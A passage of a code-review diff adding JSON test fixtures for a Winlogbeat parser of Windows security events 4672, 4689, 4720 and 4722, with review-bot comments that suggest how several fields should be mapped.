l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + "kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": 
"0x40c158b6", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "USER01-WIN.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "USER01-WIN" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "USER01-WIN" + }, + "winlog": { + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "USER01-WIN.domain.priv", + "event_id": "4672", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x40c158b6" + }, + "opcode": "Informations", + "process": { + "pid": 828, + "thread": { + "id": 27812 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "288206963", + "task": "Special Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json new file mode 100644 index 000000000..22840d53c --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4689.json 
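Review bot: `action.properties.PrivilegeList` in the `expected` block is kept as one string with embedded `\n\t\t\t` separators (`"SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege..."`), so a rule looking for a single privilege such as `SeDebugPrivilege` or `SeLoadDriverPrivilege` has to fall back to substring or regex matching over the raw message text. The field is a list in the event's own semantics, and this fixture shows the parser already splits other multi-valued `event_data` fields (see the `UserAccountControl` / `NewUACList` arrays in the 4720 fixture), so splitting `PrivilegeList` on whitespace would let the fixture expect `"PrivilegeList": ["SeSecurityPrivilege", "SeBackupPrivilege", ...]`. If the string form is intentional for compatibility with existing rules, a note to that effect in the parser would save the next reader the question.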
@@ -0,0 +1,88 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin 
:\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": "C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": 
"winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\process.exe", + "name": "process.exe", + "pid": 7672 + }, + "related": { + "user": [ + "ACCOUNT_01" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT_01" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT_01.domain.priv", + "event_id": "4689", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Informations", + "process": { + "pid": 4, + "thread": { + "id": 620 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1564712", + "task": "Process Termination" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json new file mode 100644 index 000000000..03a0543f5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4720.json 
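Review bot: The `expected` block maps `ProcessId` `0x1df8` to `process.pid` `7672` and `ProcessName` to `process.executable`/`process.name`, but the termination `Status` (`"0x0"`) is left only as a hex string under `action.properties.Status`, so there is no `process.exit_code` to query a non-zero exit on. Since the hex-to-integer conversion is evidently already available for `ProcessId`, the same conversion could populate `"process": {..., "exit_code": 0}` and the fixture should expect it. Note also that `winlog.process.pid` (`4`, the logging process) and `process.pid` (the terminated process) are different things here, which is correct but worth a one-line mention in the parser so nobody "fixes" it.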
@@ -0,0 +1,127 @@ +{ + "input": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-
Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD 
Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": 
"0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json new file mode 100644 index 000000000..99debf8cf --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4722.json 
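Review bot: The created account is lost in the `expected` block: `related.user` shrinks to `["user-name"]` although the input already carried `["user-name","USER"]`, and nothing is produced under `user.target.*` from `TargetUserName`, `TargetDomainName` and `TargetSid`, while the 4634 fixture visible earlier in this change does emit `user.target`. For an account-creation event the target is the value IAM detections pivot on, so the parser should emit `"user": {"domain": "RESEAU-COMPANY", "id": "S-1-2-3", "name": "user-name", "target": {"domain": "RESEAU-COMPANY", "id": "S-1-2-3-4-5-6-7", "name": "USER"}}` and `"related": {"user": ["user-name", "USER"]}`, and the fixture should expect that. Separately, the `UserAccountControl` and `NewUACList` arrays appear both under `winlog.event_data` and under `action.properties`; two copies of the same data can drift, so keeping one is preferable unless a consumer depends on the `winlog.event_data` path.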
@@ -0,0 +1,111 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A 
user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4722", + "kind": 
"event", + "module": "security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:53:57.535000Z", + "action": { + "id": 4722, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserName": "account-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "ACC_NAME" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account-name" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account-name", + "target": { + "domain": "DOMAIN", + "name": "ACC_NAME" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4722", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a13c3fc" + }, + 